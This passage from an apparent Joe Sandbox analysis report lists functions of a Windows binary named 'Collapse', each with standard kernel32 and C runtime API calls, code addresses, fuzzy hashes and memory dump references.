                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                        • String ID:
                                                                                                        • API String ID: 1913693674-0
                                                                                                        • Opcode ID: 1e8630fec4041c7285e46f1d9ee7b08747b3b6ee2b985e1bce4fb85734657151
                                                                                                        • Instruction ID: b4f055e16eaacd13e1254c0bab7e5d257db9b3e65e8221a95fea928390b59c1b
                                                                                                        • Opcode Fuzzy Hash: 1e8630fec4041c7285e46f1d9ee7b08747b3b6ee2b985e1bce4fb85734657151
                                                                                                        • Instruction Fuzzy Hash: 0921C571604215AF9F10AF65C885A6BB7ACFFC63747104A28F899D7251E731EC1097E0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 384e9e72e9412348d0e4a9269843f40fa1398a2202603cf42e7b1ce23478a419
                                                                                                        • Instruction ID: f83ada55bd7102be833cb29019b3858564928ff421068f3ab6f9ae0ecfa93734
                                                                                                        • Opcode Fuzzy Hash: 384e9e72e9412348d0e4a9269843f40fa1398a2202603cf42e7b1ce23478a419
                                                                                                        • Instruction Fuzzy Hash: 8021AE71608207AFDF20AFAD8C81E6A77ADBF803A47154924F91AD7251EB31EC5087A0
                                                                                                        APIs
                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 009A1F84
                                                                                                          • Part of subcall function 0099AE71: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0099C6C1,?,00000000,-00000008), ref: 0099AED2
                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009A1FBC
                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009A1FDC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                        • String ID:
                                                                                                        • API String ID: 158306478-0
                                                                                                        • Opcode ID: 5ed929f69718dcaea14e573ac6fd0ce9963ab5451b8e16f18da3ba12d238b061
                                                                                                        • Instruction ID: e01db617dc2de96ac16ee31e0b56fa74c191796400b66a2f66a613be6e4482fc
                                                                                                        • Opcode Fuzzy Hash: 5ed929f69718dcaea14e573ac6fd0ce9963ab5451b8e16f18da3ba12d238b061
                                                                                                        • Instruction Fuzzy Hash: 3D1192B2509629BFAB3127B95C8DD7F696CDE8B3A57110525F805D2142FB34CD01E1F2
                                                                                                        APIs
                                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 00982A8D
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00982A9B
                                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 00982AB4
                                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 00982AF3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Cpp_errorThrow_std::_$CurrentThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2261580123-0
                                                                                                        • Opcode ID: 4cc20e4794ca088201ca39ca0e90fd5e53d8c122ec02b9574edf11b82b9f132d
                                                                                                        • Instruction ID: 5a54e0038e347982ea2b8f78912c3a7d4cfdf97bf568912884ca40a62027f2ac
                                                                                                        • Opcode Fuzzy Hash: 4cc20e4794ca088201ca39ca0e90fd5e53d8c122ec02b9574edf11b82b9f132d
                                                                                                        • Instruction Fuzzy Hash: F621B4B4E042098FCB08EFA8C595BAEBBF5AF88300F01845DE459AB391D7389940CF51
                                                                                                        APIs
                                                                                                        • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,009A9952,00000000,00000001,?,?,?,009A34B1,?,00000000,00000000), ref: 009AA487
                                                                                                        • GetLastError.KERNEL32(?,009A9952,00000000,00000001,?,?,?,009A34B1,?,00000000,00000000,?,?,?,009A2DF7,?), ref: 009AA493
                                                                                                          • Part of subcall function 009AA4E4: CloseHandle.KERNEL32(FFFFFFFE,009AA4A3,?,009A9952,00000000,00000001,?,?,?,009A34B1,?,00000000,00000000,?,?), ref: 009AA4F4
                                                                                                        • ___initconout.LIBCMT ref: 009AA4A3
                                                                                                          • Part of subcall function 009AA4C5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,009AA461,009A993F,?,?,009A34B1,?,00000000,00000000,?), ref: 009AA4D8
                                                                                                        • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,009A9952,00000000,00000001,?,?,?,009A34B1,?,00000000,00000000,?), ref: 009AA4B8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                        • String ID:
                                                                                                        • API String ID: 2744216297-0
                                                                                                        • Opcode ID: 0cebcbcb74e3522ce529c8515d68fc93058f9b87c1700318180c61a970f44656
                                                                                                        • Instruction ID: de39ca83087c56a230fb24fdbbe98576912c5c357d8b7b5c73f3b53caca9d4aa
                                                                                                        • Opcode Fuzzy Hash: 0cebcbcb74e3522ce529c8515d68fc93058f9b87c1700318180c61a970f44656
                                                                                                        • Instruction Fuzzy Hash: B1F0F836114625BBCF222F91ED09A897FA6EB8A3B1B014610FA1D95131C772C920FB95
                                                                                                        APIs
                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0098EFB9
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0098EFC8
                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 0098EFD1
                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 0098EFDE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2933794660-0
                                                                                                        • Opcode ID: 39156526d013c5939ddd547706780e8e2e533fc6a3c7fe98834e01bf8bcc8b5a
                                                                                                        • Instruction ID: 02ef57a627ba6cd384518eb4cce8c2ddd8d07963e4147a52715e947db56f303d
                                                                                                        • Opcode Fuzzy Hash: 39156526d013c5939ddd547706780e8e2e533fc6a3c7fe98834e01bf8bcc8b5a
                                                                                                        • Instruction Fuzzy Hash: E1F0B270C5020CEBCB00DFB4CA4898EBBF8EF1C210B914A96A412E7151E730AB44EB50
                                                                                                        APIs
                                                                                                          • Part of subcall function 0099AFB3: GetLastError.KERNEL32(?,?,0099495A,009B56B0,0000000C), ref: 0099AFB7
                                                                                                          • Part of subcall function 0099AFB3: SetLastError.KERNEL32(00000000), ref: 0099B059
                                                                                                        • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,0099509A,?,?,?,00000055,?,-00000050,?,?,?), ref: 0099F825
                                                                                                        • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,0099509A,?,?,?,00000055,?,-00000050,?,?), ref: 0099F85C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$CodePageValid
                                                                                                        • String ID: utf8
                                                                                                        • API String ID: 943130320-905460609
                                                                                                        • Opcode ID: 5dad264dec8be13aa56d4a4dc60964adfd7d0ae3f84a24c0406d3a944c9370a8
                                                                                                        • Instruction ID: 8dd2fa465fe721c1bfc98ea383053440a121b6d5761faf21ac3a9327fe599d99
                                                                                                        • Opcode Fuzzy Hash: 5dad264dec8be13aa56d4a4dc60964adfd7d0ae3f84a24c0406d3a944c9370a8
                                                                                                        • Instruction Fuzzy Hash: D351F672600706BADF24AB7D8C62BABF3ACEF45700F150439F956D7182FB74E94086A1
                                                                                                        APIs
                                                                                                        • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0099A6E1,?,?,00000000,00000000,00000000,?), ref: 0099A805
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: EncodePointer
                                                                                                        • String ID: MOC$RCC
                                                                                                        • API String ID: 2118026453-2084237596
                                                                                                        • Opcode ID: f046afe6793f669e6418e5f94c7aff93dcd0232850a54ae71eb9aee8bdbccef3
                                                                                                        • Instruction ID: 8791479af9d9fe44bd555f541679f79658a543d4e769780faacac6cdd32c8f17
                                                                                                        • Opcode Fuzzy Hash: f046afe6793f669e6418e5f94c7aff93dcd0232850a54ae71eb9aee8bdbccef3
                                                                                                        • Instruction Fuzzy Hash: FF418871900209AFCF16DF99CD81AEEBBB9FF48300F1581A9F90567221D3359951DB92
                                                                                                        APIs
                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0099A2C3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1244870007.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1244851568.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245034720.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245056680.00000000009B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245165794.00000000009B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245200171.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1245436082.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___except_validate_context_record
                                                                                                        • String ID: csm$csm
                                                                                                        • API String ID: 3493665558-3733052814
                                                                                                        • Opcode ID: bdb24656dacbf4013c0f7d1560eb58fda2d10c41552e25d136acc6be93316f76
                                                                                                        • Instruction ID: 21f2e0c7d103808849ff106f09ec18cfef82a680fefc78a662c42662bfd089ff
                                                                                                        • Opcode Fuzzy Hash: bdb24656dacbf4013c0f7d1560eb58fda2d10c41552e25d136acc6be93316f76
                                                                                                        • Instruction Fuzzy Hash: 4831CD32400219EBCF228F5CCC429BE7B6AFF49715B18865AF85849221C336DCA1DBC3
                                                                                                        APIs
                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,009A0198,00000002,00000000,?,?,?,009A0198,?,00000000), ref: 009A0860
                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,009A0198,00000002,00000000,?,?,?,009A0198,?,00000000), ref: 009A0889
                                                                                                        • GetACP.KERNEL32(?,?,009A0198,?,00000000), ref: 009A089E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1244153360.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1244136409.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244178118.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244199649.00000000009B6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244221538.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244238747.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale
                                                                                                        • String ID: ACP$OCP
                                                                                                        • API String ID: 2299586839-711371036
                                                                                                        • Opcode ID: 2f5dae94e1bda38bf491eb79e4aefeaecb442cf532836418af49e8c355c0f7f6
                                                                                                        • Instruction ID: 2cae0c8040b1c5c8c6ef5fec91629d79374a24d641179ab29db74962aa24ecdf
                                                                                                        • Opcode Fuzzy Hash: 2f5dae94e1bda38bf491eb79e4aefeaecb442cf532836418af49e8c355c0f7f6
                                                                                                        • Instruction Fuzzy Hash: 4021B022A40101AADB34CF5CCA40A9777AEEFD6F60B578424E90AD7115E73BDE40D3D8
                                                                                                        APIs
                                                                                                          • Part of subcall function 0099AFB3: GetLastError.KERNEL32(00000000,?,0099D392), ref: 0099AFB7
                                                                                                          • Part of subcall function 0099AFB3: SetLastError.KERNEL32(00000000,?,?,00000028,00997816), ref: 0099B059
                                                                                                        • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 009A016A
                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 009A01A8
                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 009A01BB
                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 009A0203
                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 009A021E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1244153360.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1244136409.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244178118.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244199649.00000000009B6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244221538.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244238747.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                        • String ID:
                                                                                                        • API String ID: 415426439-0
                                                                                                        • Opcode ID: eedfe7763c6a9abb147b3593b568bac240e0318b66e50663e98e672d7a002d6a
                                                                                                        • Instruction ID: e24d3e8060b143dd30d44879f068afb565eedf5823552b5f1c3c919671c4dce9
                                                                                                        • Opcode Fuzzy Hash: eedfe7763c6a9abb147b3593b568bac240e0318b66e50663e98e672d7a002d6a
                                                                                                        • Instruction Fuzzy Hash: 2B518E71A44206AFDF20DFA5CC45BBAB7BCFF86700F144529E914E7191E7B19904CBA1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1244153360.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1244136409.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244178118.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244199649.00000000009B6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244221538.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244238747.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: db70b6725760ee1e7b0c82764c85399648d13b1201e1b058b4d747cb3a019c3f
                                                                                                        • Instruction ID: a0260da1b92cb1ff9004de9c9ed0a198fed6290f11c1224337333e7ba1ee9987
                                                                                                        • Opcode Fuzzy Hash: db70b6725760ee1e7b0c82764c85399648d13b1201e1b058b4d747cb3a019c3f
                                                                                                        • Instruction Fuzzy Hash: F4021C71E012199BDF14CFADD880AAEB7B5FF49314F25826DE519E7380D731A941CB90
                                                                                                        APIs
                                                                                                        • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009A0E99
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1244153360.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1244136409.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244178118.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244199649.00000000009B6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244221538.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244238747.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileFindFirst
                                                                                                        • String ID:
                                                                                                        • API String ID: 1974802433-0
                                                                                                        • Opcode ID: 249bb563a431ddbe659bd8887b0f3d433285cec02beacb39042eccd5c8999627
                                                                                                        • Instruction ID: 88507edbab113dea796688dc89283a3f01dbc50664673eed09c6d2ef88629ab6
                                                                                                        • Opcode Fuzzy Hash: 249bb563a431ddbe659bd8887b0f3d433285cec02beacb39042eccd5c8999627
                                                                                                        • Instruction Fuzzy Hash: 1371E47294516C5FDF30EF28CC89AAEBBB9EB86300F1441D9E449A3251EB315E849F90
                                                                                                        APIs
                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0098E438
                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 0098E504
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0098E51D
                                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0098E527
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1244153360.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1244136409.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244178118.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244199649.00000000009B6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244221538.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244238747.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                        • String ID:
                                                                                                        • API String ID: 254469556-0
                                                                                                        • Opcode ID: 613922c8e25af1602179900a43b99b80e94f3c97a383fb2bdbdf78a8ed2097ed
                                                                                                        • Instruction ID: 06d1e9825005c5ae3c93a92e878fb9c517afc07ef513114c8c9cfa5d73766741
                                                                                                        • Opcode Fuzzy Hash: 613922c8e25af1602179900a43b99b80e94f3c97a383fb2bdbdf78a8ed2097ed
                                                                                                        • Instruction Fuzzy Hash: AD31F5B5D052289BDF21EFA5D9497CDBBB8AF08304F1041AAE40CAB250EB709B85DF45
                                                                                                        APIs
                                                                                                        • GetCPInfo.KERNEL32(00000000,00000000,00000000,7FFFFFFF,?,009AA19D,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 009AA258
                                                                                                        • __alloca_probe_16.LIBCMT ref: 009AA313
                                                                                                        • __alloca_probe_16.LIBCMT ref: 009AA3A2
                                                                                                        • __freea.LIBCMT ref: 009AA3ED
                                                                                                        • __freea.LIBCMT ref: 009AA3F3
                                                                                                        • __freea.LIBCMT ref: 009AA429
                                                                                                        • __freea.LIBCMT ref: 009AA42F
                                                                                                        • __freea.LIBCMT ref: 009AA43F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1244153360.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1244136409.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244178118.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244199649.00000000009B6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244221538.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244238747.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __freea$__alloca_probe_16$Info
                                                                                                        • String ID:
                                                                                                        • API String ID: 127012223-0
                                                                                                        • Opcode ID: 5b2b783bd4fdb498f6bb5cb391c42ef3578edfa1273214e0fd55aeaeaeece609
                                                                                                        • Instruction ID: 8cf9055788fdb9f9d2bed80bae3a6f7e351f817512a1dad43468eba4cdb4542f
                                                                                                        • Opcode Fuzzy Hash: 5b2b783bd4fdb498f6bb5cb391c42ef3578edfa1273214e0fd55aeaeaeece609
                                                                                                        • Instruction Fuzzy Hash: 8771E5729002459BDF219F648C81BAE77EEEF8B710F250459FD14A7291EB7A9C40C7E2
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1244153360.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1244136409.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244178118.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244199649.00000000009B6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244221538.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
